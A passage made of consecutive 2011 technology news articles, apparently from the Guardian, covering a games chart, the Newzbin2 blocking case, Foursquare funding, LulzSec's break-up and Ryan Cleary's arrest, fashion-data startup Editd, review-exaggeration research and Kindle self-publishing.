UK top 10 video games chart, week ending 25 JunePositionGame (age rating)Platform(share%)Weeksin chart1 (1)Zumba Fitness(3+)Wii (91)Xbox 360 (7)PS3 (1)132 (4)LA Noire(18+)Xbox 360 (56)PS3 (44)63 (–)F.E.A.R. 3 (18+)Xbox 360 (59)PS3 (29)PC (12)14 (7)Dirt 3(12+)Xbox 360 (58)PS3 (42)55 (6)Lego Pirates Of The Caribbean(7+)Wii (29)Xbox 360 (26)DS (21)PS3 (16)76 (2)The Legend Of Zelda: Ocarina Of Time 3D (12+)3DS (100)27 (10)Fifa 11(3+)Xbox 360 (53)PS3 (33)Wii (4)PSP (4)398 (3)Duke Nukem Forever(18+)Xbox 360 (54)PS3 (37)PC (7)39 (5)Brink(16+)Xbox 360 (64)PS3 (33)PC (3)710 (–)Top Spin 4 (3+)Xbox 360 (60)PS3 (38)Wii (2)3UKIEGames Charts&copy; compiled by GfK Chart-Track
Hollywood film studios will take their battle against illicit downloading to the high court in London on Tuesday in an attempt to force Britain's largest internet service provider, BT, to block access to a website that allegedly distributes pirated material.Backed by studios including Warner Bros, Fox, Disney and Paramount Pictures, the Motion Picture Association (MPA) – the international arm of the US film trade body, the MPAA – is trying to get BT to cut off access to Newzbin2, a website that allegedly links to hundreds of pirated movies and music.Tuesday's high court case will be the first in Britain where an attempt is being made to force internet providers to block sites under the Copyright, Design and Patents Act. If successful, the ruling will pave the way for more music and film companies to go to the courts seeking the controversial blocking orders.Spyro Markesinis, the vice president of legal affairs for Momentum Pictures, the distributor of The King's Speech, said there were 75 different versions of the Colin Firth movie on Newzbin2."The survival of our business depends on the revenues we receive for our content," he said. "Our recent film, The King's Speech, is available on the Newzbin2 website without our consent. Neither we, nor the filmmakers, receive anything for this."Lost revenues not only threaten our business and our employees' jobs but also mean we have less money to invest in new films, so the whole industry – and particularly the independent film business – is at risk. That's why we fully support this action against Newzbin."The film industry's fight against Newzbin stretches back to March last year, when the high court ordered the site to remove all of its pirated material and pay damages to the studios. The firm behind the website, Newzbin Ltd, went into administration shortly after the ruling. However, a clone site soon appeared operated anonymously from Sweden.Chris Marcich – the MPA president for Europe, the Middle East and Africa – said the group had "no option" but to take its fight against Newzbin to the courts."Newzbin has no regard for UK law and it is unacceptable that it continues to infringe copyright on a massive and commercial scale when it has been ordered to stop by the high court," he said.Separately, the communications minister, Ed Vaizey, is leading a series of discussions with rights holders about setting up a voluntary web blocking body to curb illicit filesharing. Under the plans, ISPs would block access to websites such as The Pirate Bay on a list drawn up by copyright owners.BT declined to comment.
Social location startup Foursquare has raised a $50 million funding round, with the bullish backing of its existing investors matched by predictions for 2011 made by venture capital firm Kleiner Perkins Caufield &amp; Byers for its own iFund portfolio of companies.Foursquare announced its new funding in ablog post, revealing that the round was led by Andreessen-Horowitz with participation from existing investors O'Reilly AlphaTech Ventures and Union Square Ventures, and new backer Spark Capital.The company's founders say they will use the investment to hire more engineers, expand internationally, add more features for businesses and venues who are using Foursquare, and "try a ton of new things".Foursquare recently signed up its 10 millionth user, and has already grown from 15 staff to more than 70 in the last year, according to the post, which also takes aim at suggestions that social location is fuelled more by buzzwords than a genuine use case."Foursquare is not just about the check-in, or recommendations, or points, or badges. It's about making the world easier to use. It's about discovering new places, connecting with friends, and forging new relationships with the places you visit. It's finding new ways to layer technology on the real world... The opportunity to build something meaningful in the location space is HUGE, and we feel well-positioned to capitalize on it."Doubters will still wonder whether Foursquare's funding round, which TechCrunch claimsvalues the company at $600 million– is the latest sign of a Silicon Valley bubble around social networking and mobile applications.One company rowing back against that idea is venture capital firm Kleiner Perkins Caufield &amp; Byers (KPCB), whose mobile-focused iFund has invested in 25 startups since launching with a $100 million pot three years ago.Foursquare is not one of them, but iFund's portfolio includes games publishers Booyah, ngmoco and Zynga, social startups CoolIris, Path and Pelago, m-commerce outfit Shopkick and entertainment firms Callaway Digital, Flipboard and Shazam – KPCB chipped in to the latter's recent$32 million funding round.KPCB has justpublished an infographicto celebrate its third anniversary, claiming that its startups generated 100 million downloads in 2010, with 300 million predicted in 2011.Those companies have more than 150 million monthly active users, with the VC firm expecting that they will make $250 million of mobile revenues this year. Those two statistics are important (if unverifiable): the mobile world needs to move away from purely boasting about download numbers towards more of a focus on active users and actual revenues.KPCB's optimism is understandable: ngmoco was acquired in October 2010 by Japanese social games company DeNA for $403 million, while Pelago – the startup behind the Whrrl social location app – was bought by daily deals firm Groupon in April 2011.Is 2011 really the year when the current generation of mobile startups will make truly significant revenues? It might be more accurate to say it's the year when they will raise money and/or be acquired by bigger fish on the promise of such revenues.The key will be which startups can establish – in Foursquare's words – a genuinely "meaningful" role for their applications and technology. Although yes, that means Foursquare will also have to prove that it can find meaningful revenues.
The abrupt decision of LulzSec to disband – or, at least, toappearto disband – may have caught some people by surprise: was it like a band breaking up at the peak of its powers? Itsfinal pronouncementswere gnomic as usual, linking to a Pastebin page in which it announced it was ending after 50 days (which implies that itbeganon the weekend of 7-8 May with the hack of Fox.com for the X Factor US contestants' database) and atorrent which turned out to be virus-infected.For those who read it, the 457MB download included internal data from AOL and AT&amp;T and what are claimed to be FBI documents.The reality is that LulzSec was running out of time – and targets. As the Guardianrevealed on Friday, it was a small group of between six and 10 people, with a clear leader (Sabu) and enforcer (Kayla), with a number of hangers-on.The problem for LulzSec was that, being a small group, its targets and skills were naturally limited. The members didn't have any agenda beyond having some fun with hacking and becoming notorious for it, and so they set themselves to that.But their decision to target games companies – EVE Online, Sony – made them enormously unpopular with other hackers, who don't like having their recreations taken away. Sony had closed down the PlayStation Network; then Nintendo was hit. There wasn't much for other hackers to do except try to find out who LulzSec actually were.Meanwhile, the group upped the stakes, hitting Infragard, a company affiliated with the FBI. (This was the point where two of the members announced to Sabu that they didn't have the stomach for it.) And then it announced it had found weaknesses in the NHS's systems. It hit theUS Senate.For a small group, it's easy to run out of steam: what's the agenda? How do you keep it moving? What do you do when you start to exhaust your list of easy targets? Most hackers build up a list of potential targets over time, noting websites that they can probe and get inside and keeping them for later. Finding targets takes time; the more of you in the group and the more skilled you are – and the more carefully you time your releases – the easier it is to keep up a constant stream. Hack a lot of sites in short order and you quickly run out of low-hanging fruit, and you're on to the harder ones.That also means that it's impossible to keep up an agenda, because you have to go with whatever site you find with a weakness, not sites or companies that fit any agenda. LulzSec was thus running out of fuel. (Compare it to the number of targets that Anonymous, with a tighter agenda, hits.)Meanwhile, with more and more attention being paid to the group – by the media, law enforcement and other hackers seeking to get "dox" (real-life identity information) on them – the pressure both to do ever-greater acts and at the same time not to get caught became greater and greater.Note that LulzSec didn't have much, if any, respect from other hacking groups. Anonymous didn't refer to it. Hackers I've contacted who had been inside and outside Anonymous were universally dismissive. The LulzSec hackers didn't have any friends, which is never useful.So corralled by the external pressure of people wanting them to do ever more dramatic things, a media that was getting closer to it, and hackers who wanted to out them, allied to a dwindling list of ready-made targets, there wasn't any choice. Breaking up – more correctly, ceasing to operate under the LulzSec banner (since the group can get together any time that they come together in an IRC channel – became the obvious, safest move.And that's what happened. It won't stop the hacking by smaller groups, but it may reduce the visibility of the activity, for some time.As Paul Carr noted: "It's no coincidence that so many of these hacker collectives appear towards the end of the academic year."It could be a long summer. When's the last time you had apen teston your company's systems? Might be time to check that again.
A burst of 8 links for you to chew over, as picked by the Technology teamTelcos could be the key to Twitter's revenue model &gt;&gt; Gigaom"At WWDC this year Apple and Twitter announced a new partnership to bring Twitter to iOS devices. While this is impressive, the total number of new iOS users is dwarfed by the number of people who use feature phones worldwide. So how will services like Twitter bridge this opportunity gap?&#10;"The answer may be found in BlueVia, a prime example of the next generation of developer-friendly telco platforms. BlueVia is a spin out from Telefonica, itself a large telecommunication provider. The BlueVia platform exposes a simple set of REST APIs that enable developers to use SMS, MMS, location, and other services previously obscured with telco-only technologies like IMS and ParlayX. Perhaps more importantly, it is based on an attractive business model: pay developers for using telco APIs."Interesting too that it means the mobile operators are becoming smart pipes, not dumb ones.Security Alert: Android trojan GGTracker charges premium rate SMS messages &gt;&gt; Lookout Security blog"Lookout has identified a new Android Trojan, GGTracker, which is automatically downloaded to a user's phone after visiting a malicious webpage that imitates the Android Market. The Trojan is able to sign-up a victim to a number of premium SMS subscription services without the user's consent. This can lead to unapproved charges to a victim's phone bill."Note, not the Android Market. Targets users in the US; many of the trojans that Lookout has found before target Chinese users.Nokia, Siemens Fail to Find Investors for Joint Venture &gt;&gt; WSJ.com"Nokia Corp. and Siemens AG have shifted their focus to restructuring their joint venture in telecommunications-networking equipment, after failing to reach a deal with bidders for a controlling stake in the unprofitable business, people familiar with the matter said.In the latest blow to beleaguered cellphone maker Nokia, which controls the venture, the company and Siemens now are exploring a "self-help" deal for the business, which is known as Nokia Siemens Networks. Under such a deal, each company might put more cash into the venture, the world's No. 2 maker of wireless-networking gear, the people said."Nokia wants to sell NSN because it's not profitable enough. Joint ventures are inherently unstable, unfortunately.The Rise and Inglorious Fall of Myspace &gt;&gt; BusinessWeekFantastic reporting as usual from BusinessWeek on how MySpace became the Detroit of social networking. "Inside News Corp., analysts say Murdoch has turned his focus to his IPad-only news outlet, The Daily. Myspace is yesterday's future."Why Macs Cost More &gt;&gt; Bazinga Journal"If the average selling price of a Mac runs about $710 more than a PC (ASP of a Mac - ASP of an HP machine), and about $320 of that is profit, then the remaining $390 must be those higher costs. Apple's computing hardware, and the software development behind OS X, actually cost more to manufacture. Given the volume their manufacturing partners are turning out and the squeeze to contain costs put on them by Apple, one has to wonder why.&#10;"The answer is fairly obvious to anyone coming to Macs after years of using commodity PC equipment: better design and build quality costs more."In no way is this going to be contentious.Testing Benford's Law &gt;&gt; GithubBenford's Law has fantastic predictive abilities; it might usefully have been used on the Greek government's finances to see if it was fibbing. Lots of datasets here, with pretty graphs and info. (Via @johnrentoul).LulzSec hack reveals secret tech used by drug cartels &gt;&gt; Betanews"LulzSec's theft and disclosure of "law enforcement sensitive" documents and personal information from the Arizona Dept. of Public Safety has caused quite an uproar over privacy and security, but it has also provided a glimpse into crime in the American Southwest, where cross-border drug trafficking is a major concern. For us, It has provided a look into the impact consumer technology has had on the criminal underworld in the last three years."The Lulzsec hack shows that the police have a real struggle on their hands. Not sure if that was quite the point.Supporting choice, ensuring economic opportunity &gt;&gt; Official Google BlogIf all you read was the headline, you'd think "Pah, another of those self-serving Microsoft statements from the mid-90s where they're insisting that it's OK to be a monopoly and that the government should go away."It's 2011, it's Google, but it still feels the same.You can followGuardian Technology's linkbucket on deliciousTo suggest links, tag articles on delicious.com with "guardiantech"
Forget San Francisco. When Geoff Watts and Julia Fowler were ready to launch their ambitious fashion intelligence startup they knew straight where to head. And while London often sings the praises of its traditional strengths in the creative industries, there's an even more exciting generation of sites exploring the crossover between creativity and technology.Five years after the pair moved to London from Australia to foundEditd, the startup has just negotiated an impressively cheap deal for a large Old Street office space – and business is starting to boom.Taking advantage of the largely tech-backward fashion market, Watts and Fowler recognised that forecasting for the industry has mostly been attempted through services that offer expensive, tailored but unscientific trend books or dry, panel-based market research from the likes of Nielsen and MPD."It means the industry is making decisions off the back of what are really just guesses," says Watts. "Julia suggested that as I could already do financial modelling and data cubes, and we could crawl the web for information, then why couldn't we do that for the entire fashion world?"It's an ambitious business, but striking in its boldness and simplicity. Combining Fowler's background as a fashion designer and Watts's experience as a developer, Editd serves up customised industry trend data to clients that include retailers, designers, buyers and merchandisers. Watts describes the service as 85-90% data and 10-15% creative inspiration, but it's the scale of data gathering that lends Editd such authority.As well as crawling retail sites across the web to gather details on stock, prices and sizes, Editd monitors mentions on Twitter, Facebook and blogs, aggregates data from key catwalk and trade shows and adds a sprinkle of secret sauce that captures public "mind share".The result is a bespoke dashboard digitising the age-old mood board, also accessible through the Editd iPad app, that serves up detailed reports on anything from knitwear to colour swatches from individual designers' shows, but with the force of thousands of data sources behind it. There's also more than a little editorial potential too in Editd's data,  which can power trend lists in everything from pattern of the week (polka dots are still hot in Shoreditch) to retail quirks (high-end fruit prints just aren't selling, while Dorothy Perkins has sold out of cherry).Retailers have so far been tolerant of Editd crawling their sites for data on styles, prices and stock levels, not least because the data is useful and often differs from their own. One high-street brand asked for a report on their top 20 garments, predicting 1970s prints and maxi skirts – but the results showed tight, bodycon dresses were the biggest sellers."It was because it was the first few weeks of summer, and 18 to 30-year-old women were buying dresses on discount for nights out," Watts notes. "The retailer should have adapted their visual merchandising, discounted the 70s stuff instead of the bodycon dresses and made some more money. It's about making a structured decision."But Editd faces stiff competition. As well as traditional industry market research, extremely profitable online subscription services including WGSN and Stylesight are making big inroads into the lucrative style forecasting sector – a market that could be worth as much as $36bn (£23bn) a year, according to analysts Outsell.There's also an ultra-cool audience of far higher profile trendspotting blogs and communities, such as Polyvore, Stylehunter and The Sartorialist – all addictive reads for fashion creatives who will claim the instincts and inspirations behind trends are far too delicate for an algorithm to define. At the business end of the industry, however, where buyers are concerned with stock management and competitive online pricing, data is a powerful tool and the more sources there are, the more accurate it becomes.How does Watts feel about the competition? "Well, if someone builds an online retail storefront tool that aggregates everything and in a really nice way, we might be worried. But at the moment there's no one else doing all three – data, social monitoring and creative. The art is bringing machine-learning together with human editing and taxonomies." If that's not confident enough, Editd's ambitions don't stop at fashion."There's room in all sorts of companies for this sort of information and that's the aim for us."Editd's customer base already includes 10 high street retailers. Price is determined by the size of the client and how much data they need, but prices start at £2,000 per month for a cross-company licence. Watts won't talk about revenues, but it's early days for a company of 10 staff with a fresh seed round of $1.6m (£1m) safely in the bank. Editd was one of 10 winners at the startup beauty paradeSeedcamplast year, and its investors include Atlas Ventures, individual investor Alex Zubillaga and Joanne Wilson, wife of high-profile New York investor Fred Wilson and a buyer at Macy's. That investment will be put into "doubling down on data", says Watts, including getting more developers on board."We keep doing better than our forecasts and in 12 months we'll have more products and will be showing even more data to the public." Despite the commercial focus of the site, the pair recognise the consumer and editorial interest in fashion trends. Editd's blog picks out some highlights for non-subscribers, but there is significant potential for a wider, public audience. "We're definitely interested in opening our kimono," says Watts with a chuckle.Jemima Kiss will be visiting other digital media startups in the coming weeks
A group of hackers claiming to have attacked websites around the world, including the UK's Serious Organised Crime Agency and the US Senate, has disbanded, according to a message posted on its website.LulzSec, which consists of only six hackers, said it was disbanding after 50 days "disrupting and exposing corporations, governments, often the general population itself, and quite possibly everything in between, just because we could". "Lulz" is internet slang for laughs.As a parting shot, the group released a broad mixture of data apparently hacked from sources as diverse as computer games companies, a private investigator, the Nato bookshop and the internet giant AOL.The largest group of documents – 338 files – appeared to be internal documents from the US telecoms company AT&amp;T, detailing its building of a new wireless broadband network which is set to go live this summer.LulzSec had previously claimed to have released internal data from Arizona's department of public safety in protest at its alleged "anti-immigrant" policies, and hacked a website associated with the FBI and another run by the CIA. It also released data from the games firms Nintendo and Sony.The decision to close seemed abrupt and followed a series of blows which saw one of its alleged members arrested and charged in the UK under the Criminal Law Act and Computer Misuse Act by the e-crime unit of the Metropolitan police.The alleged identities of two others were posted online by a rival hacker, and internal chat logs between the hackers were leaked, revealing that two members had quit because they felt the hacking had gone too far.On Friday night, a LulzSec member known as Whirlpool indicated that the group was hoping to mount more serious attacks in the future, telling the BBC's Newsnight: "At some point, our operations will have to veer onto the more serious side of things".Early on Saturday evening, LulzSec announced on its Twitter feed: "Monday release is being planned. We're still here, fine sirs." But around six hours later, the group announced its demise.LulzSec signed off with an admission that it had been motivated by little more than the pursuit of "the raw, uninterrupted, chaotic thrill of entertainment and anarchy" and the desire to "selflessly entertain others".Kevin Mitnick, a security consultant and former hacker, said the group had probably concluded that the more it kept up its activities, the greater the chance was that a member would make a mistake enabling the authorities to catch them.LulzSec has inspired copycat groups around the world, he said, meaning similar attacks were likely to continue. "They can sit back and watch the mayhem and not risk being captured," he added.In a message on its website, LulzSec wrote: "For the past 50 days we've been disrupting and exposing corporations, governments, often the general population itself, and quite possibly everything in between, just because we could."The statement said the group believed strongly in a hacking movement that has become known as the "anti-sec" movement."We hope, wish, even beg, that the movement manifests itself into a revolution that can continue on without us," the statement said. "The support we've gathered for it in such a short space of time is truly overwhelming, and not to mention humbling."Please don't stop. Together, united, we can stomp down our common oppressors and imbue ourselves with the power and freedom we deserve."The group's website came under attack by a hacker who managed to temporarily disable it on Friday. There was speculation that a self-professed "patriot hacker" called Jester was responsible.Jester had previously attacked Wikileaks, the organisation that leaked hundreds of thousands of classified US government documents last year, and turned his attention to LulzSec, describing the hackers as "common bullies". Last week, he posted documents purported to reveal the identities of two of the group.At least two of the group's members quit after it hacked an FBI-affiliated site on 3 June. Records of online chatter between the conspirators, obtained by the Guardian, showed that hackers by the names of Recursion and Devrandom were "not up for the heat".Ryan Cleary, from Wickford, Essex, was arrested as part of a Scotland Yard and FBI investigation into LulzSec and charged with hacking the website of the UK Serious Organised Crime Agency.The 19-year-old's lawyer told City of Westminster magistrates court that he suffers from a form of autism, along with agoraphobia. He has been accused of attacking the website of the International Federation of the Phonographic Industry in November 2010 and the British Phonographic Industry's website in October.Observers believe LulzSec is an offshoot of Anonymous, a larger, more loosely-organised group that attempts to mobilise hackers for attacks on targets it considers immoral, such as oppressive Middle Eastern governments and opponents of WikiLeaks.
Five-star product ratings on Amazon and restaurant review websites have long reassured online shoppers and diners that they will not be wasting their money.Now, however, new research suggests that perhaps we should treat some of them with caution.The findings, to be published in theEconomic Journal, show that, in a world where everyone is competing to get their message across, there is a strong incentive for people to express extreme opinions.According toDr Kohei Kawamura, an economics lecturer at Edinburgh University, this incentive means that responses to survey questions that are more elaborate than simple "yes or no" are subject to exaggeration and, as a result, "less credible".Using complex mathematical modelling, Kawamura traced how individuals reached their decisions when allowed to give more than a yes or no answer. The modelling suggests that in these situations individuals tend to exaggerate their views to compete for influence and attention. Consequently, as the number of information providers becomes larger, extreme messages prevail and such messages tend to be less credible.Kawamura says his findings are relevant to a range of situations, from complex political issues to how seriously we should take customer reviews online. They indicate that we should "discount" one-star and five-star reviews because the reviewers are, by nature, inclined to post extreme responses to influence other potential customers."Think about the Amazon website, which has star rating from one to five for every product it sells," Kawamura said. "When there are many reviewers, each reviewer has only a small influence on potential customers and their temptation to write extreme reviews becomes large. This means we should discount extreme reviews more heavily when there are a larger number of reviews."In contrast, simple binary questions – "yes or no", "for or against" – are revealed to be the most effective way of obtaining an accurate reading of public opinion. Such an approach is widely used when canvassing in referendums and opinion polls even though the issues are more complex."Since they have no chance to exaggerate, the outcome is completely trustworthy," Kawamura said. "The research demonstrates that simple binary opinion polls can indeed be just as informative as more detailed surveys, when many people are asked."
Theotakuis the scourge of contemporary Japanese youth culture. The term, popularised in the west by science fiction author William Gibson, describes a "passionate obsessive, the information age's embodiment of the connoisseur, more concerned with the accumulation of data than of objects".Preferring to interact with computers than one another,otakuspend their time in their bedrooms, fuelled by a steady supply of junk food and information, doing things in online networks that are incomprehensible to anyone outside the community.For the most part, these techno-dropouts cause no real harm. However, theotakudo become a problem when one of their number hacks into a high-profile database. Suddenly the quiet kid next door is thrust into the spotlight, along with geeks around the globe.Otakuand their western counterparts have existed as long as computers have been networked. The internet has always held temptations for people with the time, the skills and the inclination to seek out its unsecured treasures. It's fun – and occasionally profitable – to try to break into systems.But collectives of hackers are now gaining attention. Groups like Anonymous or LulzSec  exploit celebrated qualities of the technology: it connects people with similar interests, allows them to share information freely and it is the world's greatest collection of archived materials, including detailed instructions for performing denial of service (DDoS) attacks. Although there is a small subset of women involved in their activities, most of the people in these communities are men.Arguably, there is a gender bias is built into internet and web technology. Each new iteration of computer code is built upon a previous one and, historically, programming has spoken to a binary logic associated with male cognition patterns. Had there been more women contributing to the first computer languages, there might be more female hackers now.Hacking incidents also carry cultural indicators. According to Aleks Gostev, the chief security expert on the global research and analysis team at the anti-virus software developer Kaspersky Labs, attacks that conscript a network of computers tend to come out of Russia, whereas malware tends to come from India. Gendered attacks might also have different qualities.Although some of the recent high-profile attacks have political agendas, those examining hacker culture say that most of the people who perpetrate these attacks are in it "for the lols". The researcher Danah Boyd, who has spent the past decade studying online youth subcultures, believes that the motivation of people involved in contemporaryotakuand hacker communities is to hijack the attention economy. "I grew up in a hacking culture, but my cohort was about breaking into the so-called secure government and enterprise systems to prove that we could," she says. "Now, there's another kind of subculture. There are still security breakers, but most of it is about capturing a moment that challenges what everyone is paying attention to."Indeed, there is a "look at me" element to the attacks that Ryan Cleary was alleged to have perpetrated. The apparently growing phenomenon of young people disappearing into their bedrooms to wage war on the establishment may simply be the computer generation's way of getting attention. The harm, ultimately, comes to the systems whose shortcomings are exposed by the quietotakunext door.
Even for the vindictive world of hacking, it was petulant stuff. Ryan Cleary's enemies in Anonymous, the notorious hacking collective whose exploits have embarrassed corporations and governments, planned to send scores of dildos to the Essex house where the teenager lived with his parents.Then they became more ambitious. "Fuck him over, send pizzas to his house, hire strippers, spam his emails, hack his shit, prank call his house, that's what he deserves, in fact he would do the same thing to us without feeling like a moral fag [naive prude]," one suggested.But what started out as a childish spat – one that says much about the egotistical, often tribal, nature of modern hacking – ended last week with Cleary's arrest for allegedly trying to bring down numerous targets, including the website of the Serious Organised Crime Agency.Scotland Yard might never have come knocking if, in early May, Anonymous had not felt compelled to warn its members on its AnonOps site: "Our network has been compromised by a former IRC [internet relay chat] operator and fellow helper named 'Ryan'. He decided that he didn't like the leaderless command structure that AnonOps network admins use. So he organised acoup d'etat."Anonymous, which uses as its symbol the Guy Fawkes mask made famous in the filmV for Vendetta, believed Cleary, 19, had stolen passwords and targeted the servers it used to run its websites.Someone identified as "Ryan" boasted about what he had done, telling a technology website that he and his allies had formed a new splinter group because they were disgusted with how "PR-hungry" Anonymous had become. Hacking into the Anonymous system had been "regrettable but necessary", he said.The revelation that the hackers' security had apparently been compromised by one of their own triggered anguish. "Ryan posted IP addresses of all the users, including me and I'm innocent, I just watch operations I don't get involved," one member posted online.Days later, someone hacked the website of the computer games manufacturer Eidos and made it appear that it had been defaced by a group called Chippy 1337 – whose members, it was claimed in an online calling card, included "Ryan Cleary". Then, in May, the nuclear option: Cleary's home address, telephone number and IP address were posted on an Anonymous-linked website. From that moment, he was living on borrowed time.Even some within Anonymous were aghast that Cleary's personal details had been published. As one Anonymous member posted online: "Ryan pulled a major dick move, but leave the bastard alone. Karma gets everyone in the end."Cleary's arrest has seen him transformed into two distinct characters in the public imagination. To some he was public enemy number one, a hacker of skill and menace who allegedly had the power to bring businesses to their knees. To others he was simply a computer geek who had, perhaps unwittingly, been caught up in the strange world of "hacktivism", a subset of hacking that targets large companies and governments, not for money but for a cause. Some drew comparisons with another man, Gary McKinnon, wanted in the US for allegedly hacking into the Pentagon and Nasa while searching for evidence of aliens.In the immediate aftermath of Cleary's arrest, attention quickly turned to his possible links with another hacktivism group, Lulz Security, which has close ties with Anonymous. LulzSec responded by tweeting: "Clearly the UK police are so desperate to catch us that they've gone and arrested someone who is, at best, mildly associated with us. Lame."The partial denial cannot easily be disproved. Hacktivism is decentralised. With collectives' members spread over time zones and continents, and only infrequently joining together to launch attacks co-ordinated by a handful of core operatives, linking them to a particular event or attack is often impossible.For the groups, this can be an asset. "Leaderlessness would seem to be their strength," said Ray Bryant, the chief executive of Idappcom, an internet security company. "Cut off one head and they will grow another. Arresting one person in Essex will create a martyr to the cause." But the lack of hierarchy and discipline encourages erratic behaviour among members. Anonymous recently urged its supporters to report mass sightings of UFOs, with the result that bogus stories about alien-craft sightings were reported on television stations as far afield as Russia and Argentina.Many within Anonymous, which made its name by hacking the Church of Scientology and last year attacked PayPal for refusing to process payments to the WikiLeaks website, were appalled at the childish stunt.But then, internal disputes among hacking collectives are common. Anonymous itself was formed by a breakaway faction from the group behind 4Chan, the online message board set up to share Japanese manga art. 4Chan was behind the phenomenon of "rickrolling", where people following an online link apparently relevant to what they were searching for would find themselves instead viewing a video of Rick Astley singing Never Gonna Give You Up.Following their self-imposed exile from 4Chan, Anonymous's founders eschewed such frivolous activities, painting themselves as a countercultural force, their confidence expressed in the slogan: "We are Legion. We do not forgive. We do not forget. Expect us."By contrast, LulzSec, whose website plays the theme fromLove Boatand has a monocled cartoonbon viveuras its avatar, is more flamboyant.Having shot to prominence by releasing confidential details of USX Factorcontestants, LulzSec has been blamed for attacks on Sony, Nintendo and the NHS. In one celebrated incident, it defaced the PBS news website so that it carried a fake article reporting that the deceased rapper Tupac Shakur was living in New Zealand. In the last month, the group has claimed responsibility for shutting down the US Senate and CIA websites.To celebrate its 1,000th tweet – the method by which it informs its 250,000 followers that it has launched a successful attack – LulzSec recently posted a manifesto explaining why it carried out hacks for fun (or "lulz"): "Watching someone's Facebook picture turn into a penis and seeing their sister's shocked response is priceless. Receiving angry emails from the man you just sent 10 dildos to because he can't secure his Amazon password is priceless. You find it funny to watch havoc unfold, and we find it funny to cause it."But while the anarchic appeal of both Anonymous and Lulz is earning them a global following, experts warn that their activities run the risk of obscuring the real threat posed by cyber-espionage and online organised crime.Indeed, much hacktivism is not even "hacking" in the conventional sense – that is, the illegal retrieval of confidential information from protected computer systems. Rather, it takes the form of "distributed denial of service" (DDoS) attacks, whereby software loaded onto a series of computers inundates a website with traffic, causing it to crash. Such attacks are not difficult to mobilise: the "malware" needed to carry them out can be freely downloaded from websites, while YouTube videos are available to explain how to install it. Significantly, Cleary is charged with conspiring to launch DDoS attacks, rather than hacking, suggesting he may not be the computer genius that some claim. His arrest, however, will certainly further the hacktivism cause.The success of a DDoS attack depends on building a powerful brand. The more supporters the handful of people at the centre of a hacktivism collective can reach out to, the more computers they can utilise for an attack. In Operation Payback, a co-ordinated assault on anti-piracy organisations launched late last year, Anonymous amassed a large army with impressive speed.According to the internet security company Imperva, on 5 December last year the software needed to launch the Operation Payback attack was downloaded 306 times. Three days later, more than 10,000 computers were downloading the software as Anonymous put the word out."There has been an increase in attacks; we have seen very recently an increase in activity from LulzSec," said Imperva's co-founder, Amichai Shulman. "But I don't think it's proportionate to the media attention it is getting. I don't think these people are that sophisticated. In many of the attacks, they have been using standard hacking tools."That much hacktivism is rudimentary, however, is itself a cause for alarm, according to experts. "Over the last couple of months we've seen a number of incidents starting with the break-in at [online security company] RSA, Lockheed Martin, Sony, the IMF; these are all big and respectable enterprises that had good security practices in place and yet it was relatively easy for the criminals to get in and steal the information," said Mickey Boodaei, chief executive of Trusteer, a company that specialises in providing secure web access.Experts warn that the competition to launch ever more audacious hacks creates an inflationary spiral. "I've never known a year like this: it's been predicted that very soon a big corporate will be brought down," said Professor John Walker of the Isaca security advisory group, which advises corporations on online protection.For Walker, history is turning full circle. "It's going back to the early days of virus creation, when people were doing these things to announce their presence – sending little cards cascading across computer screens to say "I've been so clever, I've infected your computer." What's happening now is about boastfulness; it's about doing something for the sake of it, because they can."Sometimes the boasts are hollow; several claims surrounding hacktivists have been exposed as false. Last week it was reported that LulzSec had obtained the 2011 UK census data and was planning to post it on the Pirate Bay, the online shopping centre for confidential information. The Office of National Statistics poured cold water on the story and LulzSec denied involvement, stating in a Twitter update: "Don't believe fake LulzSec releases unless we put out a tweet first."Even the false rumours can be useful to the hacktivism cause, helping spread fear and mayhem across the internet.Dr Simon Moores, chair of the International eCrime Congress, a body that regularly receives briefings from law enforcement agencies on how to tackle hacking, suggested the internet was facilitating a "post-modern, crowd-sourced equivalent ofThe War of the Flea– Robert Taber's influential text on guerrilla warfare. "What the Red Brigades was to the 70s, LulzSec may be to the early 21st century," Moores said.For its part, LulzSec is sufficiently self-aware to recognise that the Darwinian nature of hacking, with rival groups vying to outdo each other, means it will soon be eclipsed by a more outlandish outfit keen to grab some glory. "You'll forget about us in three months' time when there's a new scandal to gawk at," it acknowledged on its website, concluding philosophically: "This is the internet, where we screw each other over for a jolt of satisfaction."Perhaps predictably, LulzSec itself was temporarily taken down on Friday morning, apparently by an ex-military hacker known as the Jester who has waged a long-running battle against both Anonymous and LulzSec.The Jester said he did it "for the lulz". As Cleary discovered, hackers are happy to eat their own.
You know what they say: everyone has a novel inside them. Until recently, that claim was neither here nor there, because even if it was true, there was generally no way of getting said magnum opus published. So the dreams of millions of wannabe novelists remained sadly unfulfilled.But then along came Amazon with its Kindle e-reader and suddenly all that changed. For it turned out that the Kindle was not just a gadget, it was also a publishing platform. Not only that, it was a platform backed by the world's biggest online retailer.  And given that ebooks do not involve the messy and expensive business of squeezing vegetable dyes on to processed wood-pulp, the&nbsp;costs of publishing them is negligible.So Amazon created a self-publishing system based around the Kindle and offered it to the world. Henceforth, any Tom, Dick or Harry could write that novel/book that had lurked inside them for decades, upload it to Amazon's publishing engine, set a price and – hey presto! – it would be made available on the Amazon site for instant purchase and download.It's aseasyas falling off a log. First, you write your "book" using Microsoft Word in the usual way but avoiding bullet points, special fonts, headers, and footers, and inserting a page break at the end of every chapter. Next, save the document using Word's "save as web page" facility. Then download a special program from Amazon which converts your document into Kindle format. Run it through Amazon's Kindle Previewer (another free downloadable program) to check that it will look OK on the Kindle. If it looks acceptable, then upload the file to Amazon and your book will appear for sale on the Kindle store approximately 24 hours after clicking "save and publish."At first sight, it seems magical. At a stroke, all those tiresome gatekeepers – those self-important agents, editors and publishers who stood between you and recognition – are abolished. Suddenly, the world can see your hitherto unrecognised talent in all its glory. Isn't technology wonderful?Er, up to a point. This ebook technology has proved so successful that Amazon now claims to be selling more electronic publications than conventional printed ones. The company is clearly surfing a wave. According to oneindustry expert, for example, nearly 2.8 million non-traditional books, including ebooks, were published in the United States in 2010, while just more than 316,000 traditional books came out. That compares with 1.33 million ebooks and 302,000 printed books in 2009.Impressive, eh? It's only when one peruses the cornucopia of literary productions available on the Kindle store that one detects the first scent of rodent. One of the most prolific self-publishers on the site isManuel Ortiz Braschi. When I last checked he had edited, authored or co-authored no fewer than 3,255 ebooks. Mr Braschi is clearly a man of Herculean energy and wide learning, who ranges effortlessly fromHow to Become a Lethal Weapon in Two Weeks(£1.40) toHerbs 101: How to Plant, Grow &amp; Cook with Natural Herbs(£0.70) while taking inPotty Training! The Ultimate Potty Training 